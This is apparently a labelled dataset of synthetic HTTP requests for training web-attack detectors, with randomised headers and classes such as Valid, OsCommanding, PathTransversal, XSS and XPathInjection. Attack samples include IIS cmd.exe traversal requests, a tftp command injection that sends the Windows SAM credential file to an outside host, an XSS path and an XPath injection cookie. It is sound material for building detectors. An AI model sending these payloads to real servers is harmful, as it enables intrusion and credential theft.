oiw2e=~;&3illrisedlsE5n=18929&ohdgzeeaas=acmdc&7oi=N3e &sbOdOrarenero=4855510912&NeFOA3selsEuDn=yfN_M3wmsZA&etepeTrhgn=96903&0iepnofMrco5=47&75dg=[?f&R0ynUimgh=shutdown@nnetpe>]pla 2iuw&mrjayanndx3isio=-bodyss:@inlcnltdyBl

End - Id: 7890
Start - Id: 43749
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 72.203.213.43:3751
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: PSs-etere, tc-utE;q=0.6
Cache-Control: no-store
Client-ip: 251.209.185.79
Cookie: Ae=41534;tite=qffd se6;ebhumr=t;1eo=elIetDwehmU;Ed5ukr=oaeform
Cookie2: $Version="88"
Date: Wed, 02 Aug 06 12:55:43 CET
ETag: W/"S2kqKS2NgMYdq_Ze"
Expect: fe8gaSr=na4I2h
From: Reoco@amlrswscus.de
If-Modified-Since: Wed, 29 Jul 09 03:01:36 GMT
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 45
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: naeven zndoO=eonsiuNe
Authorization: NTLM ZTRubDJ0c3NQOW9BVTNzc2llc2VpdGR1SnRyZXB1dHdt
Range: 2335-
Referer: http://HnRoe4.cz/eaiwT.png
TE: deflate;q=0.0,trailers,deflate;q=0.6
Trailer: Accept-Language
User-Agent: jXW5Ktsjf http://www.pofgw1.cz
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7271x959
Via: FTP/9.0 241.198.167.113, naqf/9.5 www.etcod.js
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 36260359600073
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43749
Start - Id: 13345
class: Valid
GET /tHRzDWVj/tn/aaO86nhai/FtX6riAD/PxUa/en1zw2.css?smiHTionVt=yjL%40SCP5&cdccorhoaSsr=77&aofr=tpk+ HTTP/1.1
Host: www.d1Yrsw.be
Connection: close
Accept: audio/*, application/*;q=0.4, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: el8eo='alch'
Client-ip: 42.70.218.26
Cookie: e0Scu=teeteeuTsaeqeeoeyg;uqd2Lem= includeo O;iCuEg=4;3lnaensd=ooc;reaonmuamt=rarooME;rGEVqimgEDop=Ustdin
Cookie2: $Version="30"
Date: Sat, 19 Jan 08 20:15:57 GMT
ETag: "ttJKuhk@5HMMPoMd."
Expect: eU45eS
From: qyfmaeSc@eieatsEee.st
If-Modified-Since: Sun, 05 Nov 06 06:22:28 CET
If-Unmodified-Since: Wed, 31 Oct 07 14:45:13 CET
If-Match: "qZo23uFJ.zPupFWW@W"
If-None-Match: "RaLxJEY@sr-eBEn3p."
If-Range: "a8Z.LpznKqRUMFET"
Max-Forwards: 18
MIME-Version: 5.1
Pragma: 2chofius=jruep
Proxy-Authorization: NTLM T2ZlbW9lZmRvZWVsb2RkdDZLYTR0RWV0OWNhNGU4T0hjaW9E
Authorization: Basic RHAyU2VhZTp4ZW56U3JvRQ==
Range: 30510-65,097-,-5721
Referer: http://uomow.ch/eft3tl/tee1l/tetEgT/3easn.html
TE: deflate
Trailer: Expect
User-Agent: Uroeeo (ePLa-s; hK8OV5ZDS; eBwYjS-v)
UA-CPU: x86
UA-Disp: 537,5554,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 643x366
Via: 5.6 9.194.48.49, boHd/0.7 www.ryntio.shtml, 7.9 www.snazwiui.gif
Transfer-Encoding: deflate
Upgrade: sdnNlu/3.0, lm9eS/0.7, 8706/7.7, 5ase/6.3
Warning: 350 www.YfEsvph.shtml "g1siOyhac" 
X-Forwarded-For: 11.178.147.8
X-Serial-Number: 41919462
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13345
Start - Id: 23071
class: Valid
GET /mJZ/8It/eS/A.V5P-Mfg_dJU/srvetjhsaen0r5gg.mspx?aogbnss=959686&C5lCusrQ7group by=32&neE9lzn=nQYC&cQM9drop=a&c9predzn=biUeeokcdO&kiltsrmhe=rsKMedNsoesr&itsib=nrRilib&cilu=+pno&ROqIcnhyreN=rmG7t&ag=hsr9tolyen&unoo9qbp2xhevsV=scNnU0FNJ&oE=oBql6 HTTP/1.0
Host: 145.90.218.230
Connection: sotftr
Accept: */*;q=0.0
Accept-Charset: euc-jp, windows-1250, euc-tw;q=0.9
Accept-Encoding: 
Accept-Language: nhBoetSe-whWe1, s-oeu, tdubhn9-h;q=0.1, soexd-iesgTe
Cache-Control: no-cache
Client-ip: 236.44.41.145
Cookie: sgin1sddiiirn=Och1g
Cookie2: $Version="97"
Date: Sat, 27 Feb 10 17:46:55 GMT
ETag: "LKEW9cX7PCyUPRb.S"
Expect: abde9n
From: lito@iAtsn.st
If-Modified-Since: Tue, 03 May 05 06:17:38 GMT
If-Unmodified-Since: Thu, 27 Apr 06 09:42:36 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Mar 05 17:20:03 CET
Max-Forwards: 34
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic VHhlcmluOmV0bnJh
Authorization: 7oeAx uToEec=t66lmpr
Range: 038-288
Referer: /qtaa.pdf
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Oax4o08e/4.6.6.3.7
UA-CPU: MIPS
UA-Disp: 5084,527,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8704x5020
Via: 9.4 www.uOgbcgu.gif:4043, 9.8 198.36.80.119:812
Transfer-Encoding: gzip
Upgrade: D8c/9.2, rfff9/6.0, ios/5.5
Warning: 077 www.iusll2d.htm "OizonXfehci" "Mon, 05 Jan 09 09:29:14 UTC"
X-Forwarded-For: 95.86.251.48
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23071
Start - Id: 25566
class: Valid
GET /echoU0S8insertRb-/aeyiuot/rL5Q/oallo.png?jsttoo1oau=a&te=6892&ieie0x=ftpopc&FbS@Y4W7P=eand1t&tt=mih&otatzomlec=749562099&o4ienhewshainti=1udstui4&nc8imdno=60237295&teecuprea2p6=77&fq=691&gd2w=46653673&syao3yeke6h=8289&0veH=5tmpqne%5Dbtsystemhd1m1&oIlnr1fDwgenfkx=g%3Eeiiframelnh0scriptd%3Fe HTTP/1.1
Host: www.rtts.gov:606
Connection: teV4Y
Accept: */*
Accept-Charset: windows-1253;q=0.4, windows-1258;q=0.4, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 212.28.47.131
Cookie: rIkedthtsmedt=&km61;iuar3=ty-;uaehcLs=03
Cookie2: $Version="6"
Date: Fri, 12 Feb 10 15:14:43 CET
ETag: W/"5A-v_aoQB4Pm4KpRm"
Expect: Werom=iaEn
From: iisl@HkElln.cz
If-Modified-Since: Tue, 04 May 10 20:47:23 UTC
If-Unmodified-Since: Sat, 21 Jul 07 10:44:43 GMT
If-Match: "MSMeF8thtNPKp6q"
If-None-Match: *
If-Range: Fri, 02 Feb 07 07:46:12 CET
Max-Forwards: 76
MIME-Version: 2.4
Pragma: vEfmiv6u=a7oaiao
Proxy-Authorization: NTLM cm9lVm13NTZlNGlnQXRoaW9lbWF0bmw5Z2VlZmhuZTRUOG9O
Authorization: Basic eThzbzplbHNlYQ==
Range: 671178-,418-,636493-
Referer: http://www.2mannnz.net/rteishp7/4rseteLo.cgi
TE: trailers
Trailer: If-None-Match
User-Agent: rad1 (aoRH3-; lM1PAO@aoJ)
UA-CPU: 68000
UA-Disp: 242,0728,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 611x960
Via: FTP/4.2 www.eiEn.htm, HTTP/4.3 135.135.134.225, FTP/6.6 180.237.171.145
Transfer-Encoding: compress
Upgrade: ebaB/6.3, 6mcne/3.5, stIpas/8.0, tre7/9.7
Warning: 834 63.153.69.200 "aia1whh6z" 
X-Forwarded-For: 161.67.138.114
X-Serial-Number: 5960932931614
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25566
Start - Id: 13063
class: Valid
GET /jZs/yruGtM1S9j@wqk4WmJW/eOn2p.44Cs1w/a4dA5./uHNRrQY/Do/FUToDXPZ4-d7nmochai/jhE/aAcD.aspx?chAlf=fqms&N5ldabecg=71328203&Eihnh45irrzkrhm=4731&dd6f=tn%3A4en&Diym=keindmtsmdub9&hluIfaio5e=nw&ld=epfnifc&eonpobaeo=eaa+fftpdXanddo&Hf2=eGmo&oecna=3&d3te=safjIsir HTTP/1.1
Host: 166.120.158.84
Connection: OkewSpsS
Accept: audio/*, audio/*
Accept-Charset: x-mac-greek, iso-8859-15, isiri-3342, ks_c_5601-1987, x-mac-ce
Accept-Encoding: 
Accept-Language: j-nca;q=0.8, cr3niY-3iEwxt;q=0.5, uym7ij-o;q=0.7, hiCcprR-ewiong, ieRAht-aonide
Cache-Control: min-fresh=498
Client-ip: 21.241.196.235
Cookie: ub=Tr6Tiocebeuae4;eH9hArl=ltm;wQtawewERo0eArk=79;meataanewt=nMv24tOA-;ZWsGd%u2VJAD=amf%3Eo1pvnpz4+s
Cookie2: $Version="21"
Date: Fri, 01 Jan 10 02:31:29 UTC
ETag: W/"EkEIURHNewalKPt"
Expect: cUFtnio
From: manricn@CteJ.gov
If-Modified-Since: Sun, 01 Oct 06 09:01:55 UTC
If-Unmodified-Since: Thu, 09 Mar 06 13:23:26 UTC
If-Match: *
If-None-Match: "My@b2LQzlZLp6ede93oh"
If-Range: Sun, 23 Aug 09 13:11:17 GMT
Max-Forwards: 9211
MIME-Version: 4.1
Pragma: aLs=l
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: NTLM dGVhaW11b2w5NDg3ZWhlYWVlcmVyZ2VtaXBtZXM0ZHB3ZWFpNmhUemozbHRWbA==
Range: 55-
Referer: http://oint.ch/oSHo/Aie7a/thEqt/iosTznb/ftirsa.wmn
TE: trailers
Trailer: Referer
User-Agent: utsoqTkDge (zXQeyzZ8U; nSHhlwS; eqbCXaW; ergKPl; icxm8HJWA)
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x190
Via: crads7/5.5 www.spahi.jpg
Transfer-Encoding: compress
Upgrade: er4nxy/4.1, isaqen/1.6, iN16e/5.5
Warning: 628 www.nttty.js "cnhetkwotorseofg3" "Sat, 23 Jun 07 05:37:50 GMT"
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 837041373393858
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13063
Start - Id: 43945
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 78.124.254.131:80
Connection: euin0
Accept: image/*, image/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 203.44.173.36
Cookie: azabauurmo=eltii|;Totkiyoast1nd=8112802;dNm9oooa8n=fHJPeGIX;suourdauNroiT=rmXee>nup
Cookie2: $Version="4"
Date: Wed, 14 Mar 07 15:23:02 UTC
ETag: "SfHgMhYbzXvv1eK93q"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Tue, 04 May 10 02:09:59 UTC
If-Unmodified-Since: Fri, 24 Nov 06 17:25:07 GMT
If-Match: "Ed_MEUpQFIM27pN2sk"
If-None-Match: *
If-Range: "ZVY.pIs44xPL@0TKY"
Max-Forwards: 8291
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM b3htZWxvc25hc2JpdHNleXRxMHRvZXRvaGVzb05vb2Vo
Range: 40927-72
Referer: /rajlaOe.htm
TE: deflate
Trailer: Max-Forwards
User-Agent: y15ol (obxMh@j6R8; e@k.Z0v; hLNBHDKWt)
UA-CPU: 68000
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 539x520
Via: 3.5 www.mfdfo.jpg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43945
Start - Id: 1146
class: Valid
GET /eUAlvqpgy/gcO0Y0anma7hedez/hTT/kumMwindow.openAzlx3-fobjectB/jhomex974dtelnetCd0YYN/btoxnqrart/1BJHy_3eMXny./ida/4nodeZClsA0.js?te=Nenfrreyebs&8RV4aHhCC=tbDG&engn=cGqIZ4A&6SOLcsas=IFrrTE4%3Cpea0aiiw%26&eapiaas=8252&ithoee=e7hxosinn4Zjet&elawta=okh HTTP/1.0
Host: 152.249.141.159
Connection: r5ac
Accept: image/*;q=0.0
Accept-Charset: euc-jp;q=0.3, x-mac-greek
Accept-Encoding: *
Accept-Language: Jee-yaxirzr;q=0.2, oeh4hn9-Nuo, a-e, sectyeh-z;q=0.0, lbzaA2sn-8aoqqhln;q=0.0
Cache-Control: min-fresh=02
Client-ip: 167.142.168.152
Cookie: manor=275;WUhies588T8cFs=iSjnfNuCKOYd;ea7o0nLhi7Edw=2;Sd%u1PKc6afy=yMkK3xz;ioet0ngorrtNFro=ege5rEFouphtelnetnt4;vQ2@Cqo--=e%2Brd%7E
Cookie2: $Version="6"
Date: Sun, 16 Sep 07 09:35:10 GMT
ETag: "GZBpFHX3VLJ_hb-Gbk"
Expect: r1xhc9ql
From: Wial@ta7da.ch
If-Modified-Since: Mon, 10 Aug 09 06:38:26 UTC
If-Unmodified-Since: Sat, 06 Mar 10 02:44:40 CET
If-Match: *
If-None-Match: "joAF2UyOgVK9xUNIt86L"
If-Range: "AySOfoMQcrE5gcx"
Max-Forwards: 3
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest username="neou"
Authorization: vehwi8 ruag=tvaf6e
Range: 6-
Referer: http://iiga.cz/1oy0cs4/roieCr/tess7e8l.txt
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Reoer0Usbi (eqaA4B5@v5; epv7Gp15)
UA-CPU: x86
UA-Disp: 111,7924,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2688x3357
Via: 9.6 www.Qsst.png, 1.1 197.87.119.232
Transfer-Encoding: deflate
Upgrade: nah/6.7
Warning: 507 200.181.229.232 "iToge3nijyogt" "Mon, 27 Sep 04 16:32:38 GMT"
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 2559781115127
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1146
Start - Id: 45386
class: PathTransversal
POST /iJHlpIE2Jsrg0.pR/hrgofenwiD/phJcsCyauU@R/6betweenPtZ35OwhereNRZDJ/amaha/uOt/P8A.C0ahks./2Mwd.nsf? HTTP/1.0
Content-Length: 135
Content-Language: aln
Content-Encoding: gzip
Content-Location: http://ohwclsm.biz/sumG/usatr/nscd1/e6cmsie.swf
Content-MD5: cmh5YW5ja2NuVEdhaGp5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Oct 04 01:49:23 CET
Last-Modified: Tue, 21 Jun 05 21:25:17 UTC
Host: www.tEdwe.ch
Connection: close
Accept: application/*;q=0.4
Accept-Charset: x-mac-korean
Accept-Encoding: gzip;q=0.5, compress;q=0.3
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 2.231.241.65
Cookie: n9d=tn>;jtBi=ave;itktseitDr7sgm6=waccess_logdocumenthg;odA9cMgoefa3h= i;einae=0derb;Uhctndi=3
Cookie2: $Version="7"
Date: Wed, 09 Jan 08 04:25:07 CET
ETag: W/"I.WW9KVXZ3WpuyU2O"
Expect: oepa
From: nnrEog@dpyieuR.com
If-Modified-Since: Sat, 10 Jun 06 06:11:03 GMT
If-Unmodified-Since: Thu, 10 Mar 05 07:48:10 UTC
If-Match: *
If-None-Match: "DF49oJ3fqIoHh-M"
If-Range: *
Max-Forwards: 6
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZW9yc3M6dWRheTI=
Authorization: Basic ZXJldHI6Y3ppZWU4cG8=
Range: 49-
Referer: http://elnUl.gov/RnRd/omrjsie.pdf
TE: trailers,deflate;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: jri0eln
UA-CPU: 68000
UA-Disp: 721,775,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 789x027
Via: 5.7 www.mn9qrrd.css, Ei2/4.9 215.206.48.5
Transfer-Encoding: gzip
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 611 158.221.222.98 "nfsr5r0ueesqlqn" "Wed, 02 Mar 05 08:12:12 CET"
X-Forwarded-For: 177.133.223.189
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

6jOhurctfT8=nbselectp&.kCapevalKgF=/../../../../../../../Inetpub/iissamples/itisneetes/rest/raololtato/is.dll

End - Id: 45386
Start - Id: 46509
class: XSS
GET /<SCRIPT>/? HTTP/1.0
Host: www.natnPns.biz
Connection: close
Accept: application/*, image/*;q=0.2, text/*
Accept-Charset: iso-2022-jp, us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 21.116.120.145
Cookie: rtciixv5oC=0380670585;atnb=nvajinhfoSxazs
Cookie2: $Version="761"
Date: Thu, 05 Mar 09 05:37:48 CET
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: TyeArn
From: csa3iee@teat.com
If-Modified-Since: Thu, 30 Apr 09 09:54:53 CET
If-Unmodified-Since: Fri, 30 Apr 04 15:21:31 GMT
If-Match: *
If-None-Match: "g@zoOKua_F@PiN9D"
If-Range: Sun, 18 Oct 09 13:34:20 UTC
Max-Forwards: 21
MIME-Version: 0.6
Pragma: egaet=ep
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: 8817-695585,1-
Referer: /nynts/onssey/FaBeekdd.exe
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 3.3; et-hn; rv:2.1.5) Gecko/28801788
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: 5.3 121.37.78.182, 7.0 108.81.88.94, 7.3 www.stdypd.css
Transfer-Encoding: gzip
Upgrade: eAeah/1.9, srlfi/6.1, 8t24e/5.5
Warning: 270 www.Taaaeh.shtml "aOxgliirnstyeOIeo6rn" 
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46509
Start - Id: 48437
class: XPathInjection
GET /7vCpW7estyledG/pida/m8K87E.G0VxV3/esenbIhaohaN6gielaeg/iib9yB3T42T.php4?hk=6fByvvl-&sv=357&nwhedNnf=4erm5ds&doo9=udlaitehthm4l&ew=e0gyeEaiSuowe2&5rsehsn=gen5do9&ch=6&selectaTGSYWBGHmscript=trra&eopeLossaoittr=arhieotsreanoainserts+&e0aeaseesae7=79584738&zT0lP0d=exec92eb&cms=9459733&stti0scao5=kQrQHm1WBx9&nanburrUa=g2tetfcvar5&1dSa=rftoolime HTTP/1.1
Host: www.myeomm.st
Connection: close
Accept: text/*;q=0.2, application/*, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.7, deflate;q=0.9, deflate;q=0.0, identity
Accept-Language: uslyww-w94, 5d-1eweten;q=0.3, irtn-sutt;q=0.0, 1d-ld;q=0.0, gCi-vgrriano;q=0.0
Cache-Control: no-store
Client-ip: 251.40.60.163
Cookie: rwleWo=egt'] |    P | //user[ name/text()=  'enaep
Cookie2: $Version="79"
Date: Sun, 09 Oct 05 16:32:56 GMT
ETag: W/"SMLA09Za@Lle0gz"
Expect: x1esusj=dfIzoI
From: tzeeyyn@tbckkmdmi.st
If-Modified-Since: Wed, 02 Jul 08 07:24:57 UTC
If-Unmodified-Since: Thu, 29 Oct 09 13:31:44 UTC
If-Match: *
If-None-Match: *
If-Range: "aNX78be2AEa8GmEp"
Max-Forwards: 251
MIME-Version: 3.8
Pragma: tin='e4lorta8'
Authorization: Basic OVNlb3JBbjpkU3QzcjA=
Range: 9-73
Referer: /3Htr/n14ateot/eepoht/xe0ndket/r6uhatho.nsf
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: Mozilla/5.2 (compatible; MSIE 1.6; Mac OS X; du4fgssMp; ctmilh; jsple)
UA-Disp: 167,4504,32
UA-OS: Win9x
UA-Pixels: 8951x179
Via: 8.6 www.thuta2an.css, FTP/0.0 www.rtcfnsje.png
Transfer-Encoding: eetdmq
Warning: 051 www.lmneg.png:181 "air4u4llttLdua6Ae" 

null

End - Id: 48437
Start - Id: 44576
class: OsCommanding
GET /p@zjaiidKJbgsoundhtpass2X/KQprocessing-instructionhgwwindow.openEHNdivZetcIi/IXb/jEt2nodeZe3meta6D/SV0df2@psinclude52.asp?tadminCsMeval=19629&l57VYj7=49.50.21.72++%7C+tftp+++-i++78.136.114.136++++PUT+sam._&Z_pLQg=6434209689&hjweerilta6c8=D HTTP/1.0
Host: 239.106.96.211
Connection: 2jtN
Accept: audio/*, image/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 161.135.140.107
Cookie: oD=tu-;rHD4servicesGX2=tl3tT 1e;syey=toaocang
Date: Wed, 19 Jan 05 18:34:43 CET
ETag: "5lZWmVQ5I_0NdPW17aq1"
Expect: 100-continue
From: ne1pNm@taromiNse.be
If-Modified-Since: Thu, 11 May 06 09:10:30 UTC
If-Unmodified-Since: Thu, 18 Dec 08 05:16:17 CET
If-None-Match: *
If-Range: *
Max-Forwards: 2380
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=nmcPts
Range: 746-,-10102
Referer: http://www.o4fe.cz/yta4/qwUq/ehoA.jpg
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: Mozilla/0.8 (compatible; Konqueror/7.2; Win98; snyknr; r7meiI; antw)
Via: HTTP/2.5 31.37.238.229:80545
Transfer-Encoding: deflate
Upgrade: 93A/7.1, Vd8/3.3, stara7/6.4
X-Forwarded-For: 84.212.52.145
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44576
Start - Id: 9906
class: Valid
GET /eO/ePvcQJI@4@/reo2feiotavealE.asp?ofuoLi6=0reibxaB&bdnsosr=fasohttdsoRhsaexl&qetinhis=-eIitii1winnt1nu+s&nwihyee3hnHto=pcjeFaEa&OafoIioxreiE2=tlm0fe5m%5DaEs%5B&hQp58LS=1cayaBnp7nm4A7rwf&OAGhjrV=v2ahSqvP HTTP/1.0
Host: 197.96.248.176
Connection: keep-alive
Accept: text/xml;q=0.5, application/postscript;q=0.9, audio/x-wav
Accept-Charset: gb2312;q=0.7, iso-8859-6, iso-2022-jp, windows-1254;q=0.8, x-mac-arabic
Accept-Encoding: *
Accept-Language: n-n;q=0.3
Cache-Control: u='ened'
Client-ip: 165.172.60.9
Cookie: pemluorasd1we=oauSooh;ssvec=213251;harats=8aeqi8n;heavawghonwu=)ynu ;r5tDicarfIm=fodmsrUImfuOwttt
Cookie2: $Version="2"
Date: Thu, 06 May 10 01:19:15 GMT
ETag: "W1YghaQsoItNO1M"
Expect: 100-continue
From: reieurea@btrTy7r.com
If-Modified-Since: Thu, 11 Feb 10 01:19:09 CET
If-Unmodified-Since: Fri, 31 Mar 06 10:02:53 GMT
If-Match: "utEIS.aGUlr5vPF"
If-None-Match: *
If-Range: Sun, 20 Mar 05 08:44:42 UTC
Max-Forwards: 2621
MIME-Version: 4.6
Pragma: n0iE='623orfkn'
Proxy-Authorization: Digest username="Eynnivbc"
Authorization: Basic a3RlaUVnZTppZWVydGE=
Range: 3507-
Referer: http://www.f8nfbt.net/Abfup/aalsrlw.ace
TE: chunked;q=0.1,deflate;q=0.8,chunked;q=0.1
Trailer: Range
User-Agent: i5rsymyns (ci1Sek)
UA-CPU: StrongARM
UA-Disp: 042,750,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 475x606
Via: 9.8 123.252.9.166, 1.9 71.86.204.157:491, 9.2 108.242.143.44
Transfer-Encoding: deflate
Upgrade: eeTeSO/6.3, 4nyt/9.4
Warning: 983 www.cr4egnne.tiff "nyefhAeast3" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 15113
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9906
Start - Id: 2251
class: Valid
GET /bus0rnewduttotIo8e/mGe/toim7wiaeiradFg/fxZ5WKXlXb/oesnnerArt.html?wm=60&mhmageoinlslct=4885661&cZreNBinsertbin6shutdown.=%26sr9htmpq%40oiaki+s%3B7s&nwcrNBhtne=c7hnhsabire&oEcsyat9ev=ft%7E-7geHf+ma%2Fayh&tar4loo=0751564&oro1tc=danub&vottp=098&rEDrom9od=oeeehqeosgadal&9UZYq7script6py4=e4qw8fV&ebowdSp9=eh&t2g=d-Ym1&gorroa=7984931&ddaliTodq7sy0p=o HTTP/1.0
Host: 236.61.96.10:5
Connection: tlSidrn
Accept: application/*;q=0.5, audio/*, image/gif
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: tE-tldg;q=0.8, wcpiu-hn9hn, a8thd-lsw;q=0.5, 0Eoqu-hgsn, dsRtofy-sshlrd5
Cache-Control: no-transform
Client-ip: 221.107.9.165
Cookie: pAdutoaJ=is8m6--;lpniIeernt=idenync;yneasdR=4;3shstz9ahne=iBqu0Hw;aciotm21ri4adt=meh;FcatdivtV@0vg0X=tlElstge
Cookie2: $Version="557"
Date: Tue, 26 Feb 08 07:22:47 CET
ETag: W/"tjqftY-jdCxUK1bXKpw"
Expect: 100-continue
From: oniNcb@l92ecsed.it
If-Modified-Since: Mon, 06 Oct 08 05:00:51 GMT
If-Unmodified-Since: Fri, 28 Mar 08 07:37:14 CET
If-Match: "aq2DijZHnwoYNBh"
If-None-Match: *
If-Range: "DN1vsgjE6uGdIWM"
Max-Forwards: 54
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest username="hheA"
Authorization: NTLM NW9lZ29ha2lyN3Z0YTBwdHRmZWthb29hN3JvY1Nucm5uaHRuZQ==
Range: 98793-,-49003,-71607
Referer: /tsnisum.mpeg
TE: trailers
Trailer: Host
User-Agent: a3Iiheore (cq85b5.Y; u.fM8WOopx; 9OzkOMfAi; tiMrK3F)
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2256x733
Via: Enad4/6.4 www.sfN5oE1.tiff
Transfer-Encoding: compress
Upgrade: l6b/8.2, ddjs/1.0, EPneim/9.5, cHY/2.6
Warning: 141 102.221.143.25:60740 "vgrreunklthugbStknar" 
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 09069967
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2251
Start - Id: 889
class: Valid
GET /78includeirinxtermXPbq/knldoIc5htk0rtEbc/AXHr/tl/rna5orba/@lzihtaccesU-i/vhdmstmierlgHhi7td/sdcep0nloljn5wo/V4Htmp4HCQiBFboot.iniXOL/b2K.jpeg?od3qnicnlI0Iie=aainputoeoean&htr5ienSh0tue=nBMVgy&copyfPX=dXeBQNu6xE&iI=gahIt+SeqtsO9ga&8relento=387177030&Slct6=%3A&sorEo1lj-netcat0a=5637&6niib=sideethweasu&ebAowi5olwnonn=73&ERuegtln=iLidNvPwus8N&9havingZ-5-=ic%3Ano7ihoag8e1s&zruDaTd4R17rlno=str%7EtwdP2orhttp4logfv+uo HTTP/1.1
Host: www.nbrtdta.be:45
Connection: close
Accept: image/png;q=0.8, video/quicktime, text/plain
Accept-Charset: *
Accept-Encoding: identity, deflate, identity;q=0.4, compress;q=0.8
Accept-Language: p0eAwapr-pve;q=0.4, e-u8PN;q=0.6, cthimor-oeomtso, AnaI-6et8, ioohaKr-yAo;q=0.4
Cache-Control: only-if-cached
Client-ip: 165.140.80.210
Cookie: iIey2iracaey6G=66236256;nEio=ed;aeiloi=oBzebti
Cookie2: $Version="40"
Date: Sat, 03 Jul 04 20:46:54 UTC
ETag: "XSjeLmo19ESb18co3"
Expect: 100-continue
From: Ou2tor@taoe.fr
If-Modified-Since: Mon, 24 May 04 04:00:55 CET
If-Unmodified-Since: Thu, 20 Aug 09 18:44:49 UTC
If-Match: "A.diZddTp4It9oV"
If-None-Match: *
If-Range: *
Max-Forwards: 3768
MIME-Version: 0.0
Pragma: tgsso='osrfodai'
Proxy-Authorization: Basic ZW5lRGVhOmthbnRuUjJz
Authorization: pjriym olPtt=agdgali
